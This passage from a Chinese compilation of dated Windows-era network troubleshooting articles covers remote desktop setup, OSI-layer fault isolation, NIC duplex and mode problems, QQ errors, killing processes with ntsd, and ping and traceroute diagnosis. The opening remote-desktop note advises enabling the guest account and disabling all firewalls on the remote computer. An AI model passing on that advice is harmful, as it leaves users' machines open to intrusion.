在其中输入B机的用户名和密码，之后点击“确定”按钮。一会，您就可以登录到B机上去了。登录之后，您就可以像使用自己面前的电脑一样对远程计算机进行各种操作了，一般的软件设置小毛病足不出户就能轻松搞定了。

    注意事项：要使用远程桌面系统，在B机上必须开放“guest”用户登录权限，同时关闭系统中的各类防火墙，在电脑的“系统属性”中的“远程”标签页选中“允许从这台计算机发送远程协助邀请”和“允许用户远程连接到这台计算机”，另外，如果被叫方即B机的操作系统为Windows2000，则在A机发出申请连接后确认接受呼叫即可。


常见的网络故障排除办法

《一键清理系统垃圾》

常见的网络故障排除办法

【简 介】当网络遭遇故障时，最困难的不是修复网络故障本身，而是如何迅速地查出故障所在，并确定发生的原因。对于网管来说，首先要有一个清晰的排障思路，另外，经验也是非常重要的。

    当网络遭遇故障时，最困难的不是修复网络故障本身，而是如何迅速地查出故障所在，并确定发生的原因。对于网管来说，首先要有一个清晰的排障思路，另外，经验也是非常重要的。

    网络故障诊断以网络原理、网络配置和网络运行的知识为基础，从故障的实际现象出发，以网络诊断工具为手段获取诊断信息，沿着OSI七层模型从物理层开始依次向上进行，逐步确定网络故障点，查找问题的根源，排除故障，恢复网络的正常运行。

    网络故障症状包括一般性的（如用户不能上网、不能访问网上邻居等）和较特殊的（如路由器不在路由表中）。常见的网络排障思路如下：

    第一步：识别并描述故障现象

    分析网络故障时，首先要清楚故障现象，应该详细了解故障的症状和潜在的原因。例如，服务器不响应用户的请求，可能的故障原因是服务器配置问题、接口卡故障或路由器配置命令丢失等。收集需要的用于帮助隔离可能故障原因的信息，如广泛地从用户、网络管理系统、协议分析跟踪、路由器诊断命令的输出报告、软件说明书中收集。

    第二步：制定诊断方案，列举可能导致故障的原因

    可以根据有关情况排除某些故障原因。例如，根据某些信息可以排除硬件故障，从而把注意力放在软件上。

    第三步：排除故障

    认真做好每一步测试和观察，每改变一个参数都要确认其结果，确定问题是否解决。如果没有解决，继续下去，直到故障症状消失。

    【实例1】不能访问服务器

    要先测试一下这一故障是否只影响一台工作站，这可以通过其他工作站访问服务器来证实。如果有类似故障的工作站出现在同一网段或连接在同一交换机上，那么就要分析这一网段子网掩码是否设置正确，交换机是否正常工作。除此之外，还要看一下服务器是否禁止了这一网段工作站的服务。

    【实例2】传输上百兆数据时出现“网络资源不足”的提示

    新买来一台微机，接入局域网，当与其他的微机传输几十兆的数据时没有任何问题，但达到上百兆时，过一会儿就会出现“网络资源不足”的提示，紧接着就再也找不到网络邻居了。

    按常规，网络故障一般不排除以下几点：网卡有问题、水晶头做得不规范、网线有问题、网卡驱动或网络协议有问题等。但是根据故障现象来看，以上猜测都可以排除，因为任何一个地方存在问题，就不可能在微机之间进行数据传输，从而可以判断问题应该出在环境因素上。由于大量的数据传输需要频繁的数据读取，这就要有一个相对平稳的传输环境，而网卡附近有干扰时，这种平稳的环境就会被破坏。一般要确保网卡不插在离显卡很近的插槽上，因为现在的显卡一般都带有风扇，而显卡风扇将影响到网卡的工作，尤其是显卡在频繁工作时，影响将更加明显。把网卡拔下来，插到离显卡一个较远的插槽上，即可解决大量数据传输时出现的问题。


网络管理中的常见问题和解决方法

《一键清理系统垃圾》

网络管理中的常见问题和解决方法

网络管理是使网络可靠、安全、高效运行的保障。现代网络管理集中了通信技术和信息处理技术发展的各方面成果，它们在网络的不同管理功能中发挥作用，共同实现网络的管理任务。

    网络管理有很多技巧和窍门，下面介绍一些网络管理中的常见问题和解决方法，希望能起到抛砖引玉的作用。

    配置交换机

    将交换机端口配置为100M全双工，服务器安装一块Intel-l00M网卡，安装之后一切正常，但在大流量数据传输时，速度变得极慢，最后发现原来这款网卡不支持全双工。将交换机端口改为半双工以后，故障消失了。这说明交换机端口与网卡的速率和双工方式必须一致。目前有许多自适应的网卡和交换机，按照原理，应该能够自动适应速率和双工方式，但实际上，由于品牌不一致，往往不能正确实现全双工。这时就需要修改配置，强制设定双工方式才能解决。

    网络与硬盘

    做过网管的老师都知道，基于文件访问和打印的网络的瓶颈既不是交换机，也不是网卡，更不是服务器的CPU或内存，整个网络的瓶颈是服务器硬盘的速度。所以配置好你的服务器硬盘对于网络的性能会起到决定性的作用。主要有以下几个因素需要考虑：

    1. 硬盘接口有IDE、EIDE、SCSI等，服务器应选用适合并发数据请求的SCSI接口。目前较为流行的SCSI接口有Fast wide（20Mbps数据传输率），Ultra wide（40Mbps），Ultra2 wide（80Mbps）。

    2. 硬盘的转速越快，读写数据的速度也越快，服务器应选用7200/10000rpm的硬盘。

    3. 硬盘阵列卡能较大幅度地提升硬盘的读写性能和安全性，当然造价也会高一些。

    4. 在同一SCSI通道，不要将低速SCSI设备（如CD-ROM）与硬盘共用，否则性能会有较大下降。

    网段与流量

    某局域网内有两台文件读写极为频繁的工作站，当服务器只安装一块网卡，形成单独网段时，这个网段上的所有设备反应都很慢。当服务器安装了两块网卡，形成两个网段以后，将这两台文件读写极为频繁的工作站分别接在不同的网段上，网络中所有设备的反应速度都有了显著改善。这是因为增加的网段分担了原来较为集中的数据流量，从而提高了网络的反应速度。

    WAN与接地

    不小心将路由器的电源插头插在了市电的插座上，结果64K DDN专线就是无法接通。电信局来人检查线路都很正常，最后检查路由器电源的接地电压，发现不对，换回到UPS的插座上，一切恢复正常。

    路由器的电源插头接地端坏掉，造成数据包经常丢失，进行Ping操作时，时通时断，更换电源线后一切正常。WAN的连接因为涉及远程线路，所以对于接地要求较为严格，这样才能保证较强的抗干扰性，达到规定的连接速率，不然会出现奇怪的故障。


网络软件故障及处理

《一键清理系统垃圾》

网络软件故障及处理

启动QQ时提示"注册热键冲突"

    【故障现象】Windows 98系统，在启动腾讯QQ时出现“注册热键冲突”错误提示。

    【分析处理】出现此错误提示的原因主要有以下两个：
    ★ 在系统中已经运行了某些和腾讯QQ的热键相冲突的应用程序。对于此情况，需要找到这个发生冲突的应用程序，然后修改该程序或者腾讯QQ的热键设置。
    ★ 在系统中已经运行了腾讯QQ。启动第二个QQ程序时，系统就会弹出热键冲突的错误提示。

    QQ启动后无法正常使用

    【故障现象】 以前没有使用过任何聊天工具，最近安装了腾讯QQ，想使用它和朋友网上聊天。但是启动QQ后，发现在系统托盘中出现了一个“小企鹅”图标，但却是灰色的。QQ不能正常使用能够。

    【分析处理】 经过检查，发现当前电脑没有和Internet连接，由于没有检测到可用的连接，QQ程序不能正常使用，只会显示一个灰色图标。当与Internet建立连接后，程序即能正常使用。

    在QQ中连续发信息时信息丢失

    【故障现象】 在使用腾讯QQ和朋友交流文字信息时，发现发送的文字过多时，就会出现部分文字丢失的现象。

    【分析处理】 这个故障是腾讯QQ的一个缺陷，目前只能等待新版本的QQ来解决这个问题。在使用中，我们需要注意每次发送信息时不要输入太多文字，尽量把较长的信息分成几次发送，就可以避免这一问题的发生了。

    使用QQ聊天时信息通过服务器转发

    【故障现象】 在使用腾讯QQ和朋友聊天时，发现有些收到的信息是通过服务器转发的。这到底是怎么回事呢？是不是QQ的故障呢？

    【分析处理】 正常情况下，在使用腾讯QQ聊天时，信息在两台电脑之间直接传送。当网络连接不通畅时，正在聊天的两台电脑不能直接收发信息，QQ就会自动通过专门的服务器转发。这并不是QQ的故障，也不会影响到正常的聊天。使用时，基本上不用理会这种情况。等到双方网络连接正常之后，程序会自动恢复客户端之间的直接传送信息。

    QQ好友列表中少了很多好友

    【故障现象】 使用腾讯QQ作为聊天工具，以前的使用都很正常。但是，上次登录后发现好友列表中的好友丢失了很多，而且有些头像也变了。请问这是怎么回事呢？

    【分析处理】 根据现象分析，导致这个问题的原因是用户的QQ数据库出现了故障，或者是QQ程序本身有问题。将原程序卸载，重新安装QQ并运行，然后选择【系统菜单】中的【注册向导】命令，使用原账号和密码重新注册一次，并重新从服务器上下载用户资料和数据。经过此操作后，故障排除。

    注册QQ账号时系统出错

    【故障现象】 在注册QQ账号时，系统出现错误提示“连接超时，登录服务器失败”。

    【分析处理】 导致此现象的可能原因包括以下两种：
    ★ 用户的网络设置有误，或者网络连接出现问题。这种情况下，无法进行QQ注册操作。
    ★ QQ服务器过于繁忙，无法及时地响应用户的请求。此时，应稍候再试，或者选择其他注册方式，腾讯提供了多种注册方式，具体内容请参见其网站（www.tencent.com）。

    如何卸载腾讯浏览器

    【故障现象】 Windows XP系统，安装了腾讯QQ之后，它自带的腾讯浏览器就成了系统的默认浏览器。因为不太习惯腾讯浏览器，想将其卸载，应该如何操作？

    【分析处理】 卸载腾讯浏览器的方法如下：
    1. 在控制面板中打开【添加或者删除程序】窗口。
    2. 在【当前安装的程序】列表中选择腾讯QQ程序，然后单击【更改/删除】按钮。
    3. 在接下来的腾讯QQ卸载向导中，将所有与Explorelnk相关的组件卸载。
    4. 关闭卸载向导和【添加或者删除程序】窗口。

    无法查看QQ用户资料

    【故障现象】 使用腾讯QQ时，发现在好友列表中，有些联系人的个人资料无法查看。每次想查看这些用户的个人资料时，系统都会弹出“服务器拒绝查看”信息。

    【分析处理】 出现这样的现象，是因为这些用户在登记个人资料时选择了资料完全保密，当其他用户试图查看此类用户的个人资料时，系统就会提示“服务器拒绝查看”。

    如何防止QQ密码被盗

    【故障现象】 使用一年多的QQ号码被盗了，真是很麻烦。请问有没有什么好办法防止号码被盗？

    【分析处理】 对于个人的QQ号码，主要应从以下几个方面注意：
    ★ 比较可靠的方法是申请腾讯的密码保护功能。如果申请了这项功能，即便是别人盗走了密码，也可以通过密码保护功能把密码找回来。
    ★ 收到可疑的邮件之后，不要轻易打开邮件的附件，以避免他人使用黑客程序窃取密码。
    ★ 最好避免在网吧等公共场所使用QQ。如果已经使用了，那么就需要注意在离开时把QQ密码和本地消息记录文件清除掉。

    安装ICQ时系统提示出错

    【故障现象】 在安装ICQ时，安装程序报错，提示信息为“Could not initialize installation (CRC):Cannot create a file when that file already exists”。

    【分析处理】 这种错误通常在安装ICQ时发生，一般来说都是由于用户运行了一个没有正确下载或者没有完全下载的安装程序所致。出现此情况时，可以尝试重新下载ICQ的安装程序并安装。


如何关闭进程中无法清除的进程

《一键清理系统垃圾》

如何关闭进程中无法清除的进程

  Windows XP/2000的任务管理器是一个非常有用的工具，能让你看到系统中正在运行哪些程序（进程），只要你平时多看任务管理器中的进程列表，熟悉系统的基本进程，就可以随时发现可疑进程，这对防范木马和病毒大有裨益！不过有一些可疑进程，你用任务管理器却无法杀掉，这该怎么办呢？

    一、哪些系统进程不能关掉

    Windows运行的时候，会启动多个进程。只要你按下“Ctrl+Alt+Del”键打开任务管理器，点击“查看”/选择列，勾选“PIO（进程标识符）”，然后单击“进程”标签，即可看到这些进程（如下图1）。不过有一些进程个人用户根本用不到，例如Systray.exe（显示系统托盘小喇叭图标）、Ctfmon.exe（微软Office输入法）、Winampa.exe等，我们完全可以禁止它们，这样做并不会影响系统的正常运行。

    二、如何关闭任务管理器杀不了的进程

    如果你在任务管理器中无法关闭某个可疑进程，可以使用下面的方法强行关闭，注意不要杀掉进程表中的系统核心进程：

    1． 使用Windows XP/2000自带的工具

    从Windows 2000开始，Windows系统就自带了一个用户态调试工具Ntsd，它能够杀掉大部分进程，因为被调试器附着的进程会随调试器一起退出，所以只要你在命令行下使用Ntsd调出某进程，然后退出Ntsd即可终止该进程，而且使用Ntsd会自动获得Debug权限，因此Ntsd能杀掉大部分的进程。

    操作方法：单击“开始”/程序/附件/命令提示符，输入命令：ntsd -c q -p PID（把最后那个PID，改成你要终止的进程的PID）。在进程列表中你可以查到某个进程的PID，例如我们要关闭图1中的Explorer.exe进程，输入：ntsd -c q -p 408即可。
    以上参数-p表示后面跟随的是进程PID， -c q表示执行退出Ntsd的调试命令，从命令行把以上参数传递过去就行了。

    2． 使用专门的软件来杀进程

    任务管理器杀不掉的进程，你可以使用专门的软件关闭。有很多软件可以杀进程，例如进程杀手、IceSword、柳叶擦眼、系统查看大师、Kill process等。

    （1）进程杀手2.5
    它能够浏览系统中正在运行的所有进程，包括用Ctrl+Alt+Del 看不到的进程，可以精简进程、自动中止系统基本进程以外的所有进程，对木马和病毒进程有一定清除作用，你可以用它随时中止任一个正在运行的进程，选中该进程，按“中止进程”按钮即可。

    （2）IceSword
    如今系统级木马后门功能越来越强，一般都可轻易隐藏进程、端口、注册表、文件信息，普通进程工具根本无法发现这些“幕后黑手”。IceSword使用大量新颖的内核技术，可以查出所有隐藏进程。
    要查看当前进程，请点击“进程”按钮，在右部列出的进程中，隐藏的进程会以红色醒目地标记出，以方便查找系统级后门。如果要结束某进程，可以先选中它（按住Ctrl键可选择多个进程），然后使用右键菜单的“结束进程”，即可关闭之。

    （3）柳叶擦眼
    它可以列出系统中所有的进程（包括隐藏的），并可以杀死进程，能自动标示出系统文件，自动中止基本进程外的所有进程，还具有IE保护功能。
    运行软件后，单击“柳叶擦眼”可以显示当前正在运行的所有进程，你只需注意那些“定义级别”为“未知”及“危险”的进程，按“降妖伏魔”按钮关闭它们即可。
    （4）系统查看大师1.0
    目前许多木马都是在后台运行的，它们运行时会隐藏自己的窗口，因此你无法在屏幕上看到它们。该软件可以获取隐藏的不可见窗口，让你发现木马踪影、关闭之。
    软件运行后，在左侧视图中点击“取不可见窗口”按钮，右侧的窗口中就会显示出所有当前运行的、隐藏的不可见窗口标题，选定其中的可疑窗口，然后点击右下端的“结束此窗口”按钮，即可关闭之。如果你要关闭某进程，可以单击“进程列表”按钮，选中该进程，然后右击鼠标在弹出的窗口中，单击“结束进程”即可。


网络故障分层排查技巧

《一键清理系统垃圾》

网络故障分层排查技巧

【简 介】为了降低设计的复杂性，增强通用性和兼容性，计算机网络都设计成层次结构。这种分层体系使多种不同硬件系统和软件系统能够方便地连接到网络。管理员在分析和排查网络故障时，应充分利用网络这种分层的特点，快速准确地定位并排除故障。然而在实际故障排查过程中，这种分层方法往往被忽略，导致故障排查效率降低。

    为了降低设计的复杂性，增强通用性和兼容性，计算机网络都设计成层次结构。这种分层体系使多种不同硬件系统和软件系统能够方便地连接到网络。管理员在分析和排查网络故障时，应充分利用网络这种分层的特点，快速准确地定位并排除故障。然而在实际故障排查过程中，这种分层方法往往被忽略，导致故障排查效率降低。

    两种逐层排查方式

    OSI的层次结构为管理员分析和排查故障提供了非常好的组织方式。由于各层相对独立，按层排查能够有效地发现和隔离故障，因而一般使用逐层分析和排查的方法。

    通常有两种逐层排查方式，一种是从低层开始排查，适用于物理网络不够成熟稳定的情况，如组建新的网络、重新调整网络线缆、增加新的网络设备；另一种是从高层开始排查，适用于物理网络相对成熟稳定的情况，如硬件设备没有变动。无论哪种方式，最终都能达到目标，只是解决问题的效率有所差别。

    根据具体情况选择排查方式

    具体采用哪种方式，可根据具体情况来选择。例如，遇到某客户端不能访问Web服务的情况，如果管理员首先去检查网络的连接线缆，就显得太悲观了，除非明确知道网络线路有所变动。比较好的选择是直接从应用层着手，可以这样来排查：首先检查客户端Web浏览器是否正确配置，可尝试使用浏览器访问另一个Web服务器；如果Web浏览器没有问题，可在Web服务器上测试Web服务器是否正常运行；如果Web服务器没有问题，再测试网络的连通性。即使是Web服务器问题，从底层开始逐层排查也能最终解决问题，只是花费的时间太多了。如果碰巧是线路问题，从高层开始逐层排查也要浪费时间。

    在实际应用中往往采用折衷的方式，凡是涉及到网络通信的应用出了问题，直接从位于中间的网络层开始排查，首先测试网络连通性，如果网络不能连通，再从物理层（测试线路）开始排查；如果网络能够连通，再从应用层（测试应用程序本身）开始排查。
首先使用ping命令测试连通性。在TCP/IP网络中，排查网络问题的第一步常常是使用ping命令。如果能够成功地ping到远程主机，就排除了网络连接出现故障的可能性。即使是使用ping命令，也有一个逐步检测判断的步骤。
例如，假设有一个如图1所示的网络，这里要测试网络能否正常通信。通常从ping远程计算机开始（例中在主机A上ping主机B），成功说明系统和网络正常，失败说明主机离线或网络故障。失败后再ping同一子网的网关（例中为192.168.1.1）来确认主机A是否能够连接到路由器。失败后再ping环回地址127.0.0.1来确认TCP/IP协议软件是否有问题，如果有问题，需要重新安装TCP/IP协议软件。也可以采用另一种步骤，从ping环回地址127.0.0.1开始，失败说明TCP/IP协议软件安装有问题，如果成功再ping同一子网的网关，如果成功再ping其他网关（路由器）逐步排查网络各个环节，直到最后ping远程主机。只要成功地ping到远程主机，可以判断网络问题一般发生在更高层次。

    分层排查网络的措施

每个网络层次都有相应的检测排查工具和措施，各层的基本排查措施如图2所示。在最底层的物理层，专业人员往往采用专门的线缆测试仪，没有测试仪的可通过网络设备（网卡、交换机等）信号灯进行目测。数据链路层的问题不多，对于TCP/IP网络，可以使用简单的arp命令来检查MAC地址（物理地址）和IP地址之间的映射问题。网络层出现问题的可能性大一些，路由配置容易出现错误，可通过route命令来测试路由路径是否正确，也可使用ping命令来测试连通性。协议分析器（如微软提供的网络监视器）具有很强的检测和排查能力，能够分析链路层及其以上层次的数据通信，当然包括传输层。至于应用层，可使用应用程序本身进行测试。


如何查找局域网中的故障

《一键清理系统垃圾》

如何查找局域网中的故障

网络经常会出现故障，就如人会经常生病一样，在出现网络问题之后，最重要的是不要着急，头脑要保持清醒。查清问题出在哪里，一般有以下几种情况:

    一、当整个网络都不通时，可能是交换机或集线器的问题，要看交换机或集线器是否在正常工作。

    二、只有一台电脑网络不通，即打开这台电脑的“网络邻居”时只能看到本地计算机，而看不到其它计算机，可能是网卡和交换机的连接有问题，那么我们首先要看一下RJ-45水晶头是不是接触不良。然后再用测线仪，测试一下线路是否断裂。最后要检查一下交换机上的端口是否正常工作。

    三、在“网络邻居”中不能看到本地计算机，或打开“开始/运行”中用“PING”命令，“PING”本地计算机的IP地址不通时，说明你的网络设置有问题，那么首先想到的应该是网卡，我们可以打开“控制面板/系统/设备管理/网络适配器”设置窗口，在该窗口中检查一下有无中断号及I/O地址冲突，一般情况下NE2000系列的网卡为IRQ3，8029芯片的网卡为IRQ10。如发现网卡没有冲突，下一步就要检查驱动程序是否完好，然后重新安装网卡的驱动程序。

    四、在“网络邻居”中能看到网络中其它的计算机，但你不能对它们进行访问，那么可能是你的网络协议设置有问题。把你以前的网络协议删除后，再重新安装，并重新设置。


模式不当导致网络故障解决办法

《一键清理系统垃圾》

模式不当导致网络故障解决办法

近日，笔者家中的网络出现了异类现象，无法正常上网，让笔者很是苦恼了一把。

    网络环境

    家中有两台计算机，其中用于Internet连接共享的主机安装了两块网卡，一块是计算机内置的10M网卡，另外一块是10/100M自适应的网卡，其中内置的10M网卡直接与小区的局域网交互机相连接，接入到小区宽带网络中，10/100M自适应的网卡直接与家中的另外一台计算机相连接，家中两台计算机相互传输数据时的速度可以达到100M标准。

    故障现象

    最近笔者在Internet连接共享主机中在线观看电影时，发现网络突然出现断流现象，考虑到小区的电信宽带局域网，偶尔也会发生网络突然断线的故障，这种故障一般会过一段时间后就能自然恢复了，因此笔者一开始也没有把网络突然断流故障放在心上，于是就忙其他事情了。可过了几天后，笔者再次上网时，发现这样的断流故障仍然存在;不得已，笔者向电信公司报了维修故障，请来了电信的网络技术人员。这位老兄看上去技术还挺娴熟的，对我提到的故障现象好象早已了然于胸，径直对操作系统的相关设置进行了调整，然后又打开网络属性设置窗口，把网卡的工作模式修改了一下，整个过程大约只持续了1分钟。满以为行家一出手，就能立马把网络断流故障“驱走”;可谁曾想到，再次上网测试时，发现行家的“闪电行动”竟然没有任何效果。这一下，行家放慢了检查速度，对系统的任何上网设置进行了逐一查看，在确信上网设置一切正常的情况下，又开始了对网络连接线路的排查;功夫不负有心人，最后电信的工作人员终于找到故障的“罪槐祸首”，原来是小区的局域网交换机因意外原因突然停电了，怪不得在参数设置方面鼓捣来、鼓捣去，没有一丁点作用!

    到了这里好象网络断流故障就应该解决了，然而人算不如天算，当电信的工作人员将局域网交换机的电源接通后，用于Internet连接共享的主机直接就不能上网了，但是将10/100M自适应的网卡与局域网交换机连接时，上网就正常了。那么为什么计算机内置的10M网卡，突然之间就不能正常工作了呢?电信的行家给了笔者这样的解释，或许是由于内置10M网卡在长时间工作后性能的稳定性已大大下降，或许是内置网卡无法从主板中获得足够的电源功率。的确，当笔者尝试着将计算机内置的10M网卡，与家中的另外一台计算机相连接时，发现家庭内部的网络也不通了，这似乎也验证了电信行家的结论是正确的。

    故障解决

    笔者怎么也想不通，网卡为什么会在突然之间就损坏了，毕竟它传输的通常都是微弱信号，在没有受到外力干预的情况下，网卡往往是不容易被报废的呀?!笔者实在不甘心就这样不明不白地让网卡“退役”，于是自己动起了脑子，开始思考电信人员过来维修的全过程;突然之间笔者想到维修人员好象对网卡的工作模式进行过修改，会不是网卡的工作模式惹的祸呢?于是我一不做，二不休，迅速打开网络属性设置窗口，在“常规”标签页面中选中计算机内置的10M网卡，并单击一下“配置”按钮，在其后出现的配置页面中，查看到网卡的当前工作模式是BNC 10base2，而该工作模式通常用于以同轴电缆作为传输介质的网络连接，而目前我的网络是通过双绞线与局域网交换机相连接的，很明显网卡的工作模式设置出现了错误。另外网卡还有几种工作模式，它们分别是全双工模式、半双工模式以及AUI 10base5模式，其中AUI 10base5模式也是用于以同轴电缆作为传输介质的网络连接的，剩下的网卡只能工作在全双工模式下或半双工模式下了。后来，笔者又尝试着将网卡分别设置为全双工模式和半双工模式进行工作，发现网卡此时都能正常工作，而且网卡也不出现断流现象了。至此，网卡断流故障就这样解决了!

    故障总结

    总结上面的故障排除过程，笔者得出了以下几点体会:

    1、遇到网络访问出现故障时，应该首先对网络的物理连接以及网络硬件自身的状态进行一下检查，毕竟这方面检查有的可以直接通过人眼观察出来;例如本文中的局域网交换机由于遇到意外原因突然停电了，要是此时我们先观察一下网卡的信号指示灯状态，说不定就能快速把交换机停电的因素给查找出来，而用不着花费太多的时间，在参数设置和系统设置方面进行鼓捣，这样就能提高网络故障排除的效率。

    2、发生任何网络故障，需要请其他专业技术人员帮忙维修时，必须尽可能详细地把故障现象描述给维修人员，这样可以帮助维修人员缩小故障排查范围，快速准确查找故障原因。

    3、要注意网卡工作模式对网络传输状态的影响，以便日后遇到相同故障状态时，能尽快地恢复网络故障。例如，当网络传输状态一切正常时，你可以将此时的网卡工作模式记忆下来;要是以后网卡一旦遇到什么故障，你就能很容易判断和调整故障了。只要打开网络属性设置窗口，进入到“常规”标签页面，选中发生故障的网卡型号，再单击“配置”按钮，打开网卡工作模式设置窗口，检查网卡当前工作模式是否和正常模式一致，要是不一致的话，你不妨尝试着将它调整为正常模式，说不定你遇到的网卡奇怪故障就自动消失了。

    4、尽可能地在计算机中安装Windows 2000以上版本的操作系统，毕竟这样的操作系统能对一些常规性的网络故障，进行自动诊断并给予你相应提示，你只要善于利于系统自动诊断提示，就能大大提高解决故障的效率。例如，一旦物理连接线路有问题的话，Windows 2000操作系统会自动提示你，当前连接电缆没有连接好，这样你就能根据系统诊断出来的故障提示，来缩小故障排查范围，从而提高故障排除效率。相反，本例中笔者的计算机中安装的是Windows 98系统，因此发生网卡断流故障时，不知道是物理连接线路断开引起的，还是数据包堵塞造成的，或者还是网络参数设置不当造成的，如此一来维修人员就必须逐项进行排查，很显然Windows 98系统不利于故障的迅速排查。


梳理网络——故障排除点点通

《一键清理系统垃圾》

梳理网络——故障排除点点通

计算机的网络系统是异常复杂的，网络软件甚至比网络硬件设备及计算机要复杂得多。作为有几年工作经验的网管员，我深知网络排障不是一件轻而易举的事情。在我所遇到的诸多问题当中，纯粹由于硬件的问题导致网络系统故障的，并不是很多。服务器、交换机、路由器和磁带机这些设备成年累月放在那儿，没人动它们，也很少出故障。

    说起网络排障，它是一种与其它技术相似的技术，排障是从网络系统中消除错误的实施过程。尽管排除计算机系统中的错误很难，但是遵照几个基本规则，可以很快地独立找出错误，从而最迅速地解决故障。

    微软公司曾经对大量的专业的故障诊断人员进行调查，以期得知他们之所以能成功地处理故障的原因。这些专业人员将大部分的原因归功于对网络系统知识的熟练掌握和丰富的经验。

    当然，不具备有关使用计算机的知识，或特定故障的处理经验，也可以诊断出一些故障。但是最迅速最有效地解决故障的人员均具有操作系统及硬件的知识和解决系统故障的经验，并且将所遇到的问题以及处理方法记录成文档。

    在故障诊断方面微软的技术支持工程师们创造了一种DETECT模式。这种策略基于解决问题的调查研究之上，它包含以下六个步骤:

    1. 发现问题——与用户在他们的水平上交谈，并请注意，他们使用的术语和过程也许不如你的精确。征兆是什么?他们运行的软件是什么发行版本?他们的硬件是否在硬件兼容列表(HCL)中?

    2. 划定界限——自从系统最后一次正常工作到现在，都作了哪些变动?故障发生时，还在运行何种其它软件?故障是否可以重现?请检查你的故障库和TechNet以参考类似的故障，是否可以迅速修复?

    3. 追踪可能的途径——因为你已经从第一次故障排除中学到了很多知识，在这个阶段，使用有效的方法将比试验——失败——再试验的方法好得多。

    4.执行一种方法——请记住，要做这种方法无效的最坏的打算。你是否要备份关键系统或应用文件?

    5. 检验成功——如果所采用的方法是成功的，那么这种故障能否重新出现?如果是，那么用户是否知道该如何处理?

    6.做好收尾工作—— 一旦确定该故障与用户关系密切时，将其反映在经验中。你如何建议用户下次再使用这种方法?归档其征兆、故障的原因以及解决方法。包括你是如何确定故障及解决方案的，最后与别人共享结果。

    如果我们把网络系统中的设备看成一个个的物理点，也可以叫做网络故障点。那么问题就成了对系统中点故障的排查。

    我们最好是把故障分成几类，由低到高，这样故障就变成了模块化和区域化的了，网络排障也就成了一件轻松的工作了!

    最底层是物理层，如果网络端口出现问题，线路出现问题，就是物理层的故障。

    然后是网络层，网络协议的配置，IP地址的配置，子网掩码和网关的配置，以及各种系统参数的配置，是排障时要查的主要内容。

    还有就是网络操作系统层，是指运行在硬件设备上的各种网络操作系统，包括UNIX、WindowsNT/9X、Linux、NetWare 等。这一层大家最为熟悉，但这一层存在的问题也非常之多，主要是各种操作系统存在的系统安全漏洞及和许多应用软件之间的冲突。在这些问题导致的故障中，网管员能做的就是及时从网络操作系统软件产品提供商那里得到最新的补丁，以保证自己的网络系统的安全。

    再往上是应用层的故障。如果各种网络应用都加上了，域名解析服务器(DNS)、DHCP服务器、邮件服务器和WEB服务器等，那就要关注它们的使用情况。可以利用各种网络监测与管理工具，比如任务管理器(Task Manager)、性能监视器(Perfermance Monitor)及各种硬件检测工具等，当然利用注册表是一个最终也是最有效的方法。

    还有一层是应用系统层，也是我们日常工作的地方，比如办公软件、财务软件、数据库软件，其中最大的问题就是病毒问题和被人非法访问更改的问题了。病毒问题当然最快的解决方法是使用杀毒软件，非法访问这类问题是信息安全的问题。如果有条件，加装防火墙拒绝许多IP的非法入侵是很有效的。如果非法访问来自企业内部，那么对企业信息的管理应该是你急需解决的问题吧!

    我想，如果能够按这个思路来分析处理网络上面出现的故障，一个个故障点会迎刃而解的!

    网络排障，心有灵犀点点通!


网络故障诊断和排除

《一键清理系统垃圾》

网络故障诊断和排除

  一个成熟的网络管理机构一般都制定有一整套完整的故障管理日志记录机制，同时人们也率先把专家系统和人工智能技术引进到网络故障管理中心。但对于大多数初学网络的人来说，这未免有点过于复杂，不过没关系，我来帮大家总结一下网络故障诊断和排除的方法和经验，供各位网管和菜鸟参考。

    我们可以根据网络故障的性质把网络故障分为物理故障与逻辑故障，也可以根据网络故障的对象把网络故障分为线路故障、路由故障和主机故障。

    下面首先介绍按照网络故障不同性质而划分的物理故障与逻辑故障。

    1.物理故障

    物理故障指的是设备或线路损坏、插头松动、线路受到严重电磁干扰等情况。比如说，网络管理人员发现网络某条线路突然中断，首先用ping或fping检查线路在网管中心这边是否连通。

    ping的格式为：ping　www.cisco.com或ping 192.168.0.1 （192.168.0.1是IP地址，可以是主机的IP也可以是网络中另一台计算机的IP）。ping一般一次只能检测到一端到另一端的连通性，而不能一次检测一端到多端的连通性，但fping一次就可以ping多个IP地址，比如C类的整个网段地址等。顺便多说一句，网络管理员经常发现有人依次扫描本网的大量IP地址，不一定就是有黑客攻击，fping也可以做到。如果连续几次ping都出现"Requst time out"信息，表明网络不通。这时去检查端口插头是否松动，或者网络插头误接，这种情况经常是没有搞清楚网络插头规范或者没有弄清网络拓扑规划的情况下导致的。

    另一种情况，比如两个路由器Router直接连接，这时应该让一台路由器的出口连接另一台路由器的入口，而这台路由器的入口连接另一路由器的出口才行。当然，集线器Hub、交换机、多路复用器也必须连接正确，否则也会导致网络中断。还有一些网络连接故障显得很隐蔽，要诊断这种故障没有什么特别好的工具，只有依靠经验丰富的网络管理人员了。

    2. 逻辑故障

    逻辑故障中最常见的情况就是配置错误，就是指因为网络设备的配置原因而导致的网络异常或故障。配置错误可能是路由器端口参数设定有误，或路由器路由配置错误以至于路由循环或找不到远端地址，或者是路由掩码设置错误等。比如，同样是网络中的线路故障，该线路没有流量，但又可以ping通线路的两端端口，这时就很有可能是路由配置错误了。遇到这种情况，我们通常用“路由跟踪程序”就是traceroute，它和ping类似，最大的区别在于traceroute是把端到端的线路按线路所经过的路由器分成多段，然后以每段返回响应与延迟。如果发现在traceroute的结果中某一段之后，两个IP地址循环出现，这时，一般就是线路远端把端口路由又指向了线路的近端，导致IP包在该线路上来回反复传递。幸好traceroute可以检测到哪个路由器之前都能正常响应，到哪个路由器就不能正常响应了。这时只需更改远端路由器端口配置，就能恢复线路正常了。

    逻辑故障的另一类就是一些重要进程或端口关闭，以及系统的负载过高。比如也是线路中断，没有流量，用ping发现线路端口不通，检查发现该端口处于down的状态，这就说明该端口已经关闭，因此导致故障。这时只需重新启动该端口，就可以恢复线路的连通了。还有一种常见情况是路由器的负载过高，表现为路由器CPU温度太高、CPU利用率太高，以及内存剩余太少等，如果因此影响网络服务质量，最直接也是最好的办法就是——更换路由器，当然换个好点的。（如果你有银子的话）

    网络故障根据故障的不同对象也可以划分为：线路故障、路由故障和主机故障。

    1. 线路故障

    线路故障最常见的情况就是线路不通，诊断这种情况首先检查该线路上流量是否还存在，然后用ping检查线路远端的路由器端口能否响应，用traceroute检查路由器配置是否正确，找出问题逐个解决。方法在前面已经提过，这里就不多说了。

    2. 路由器故障

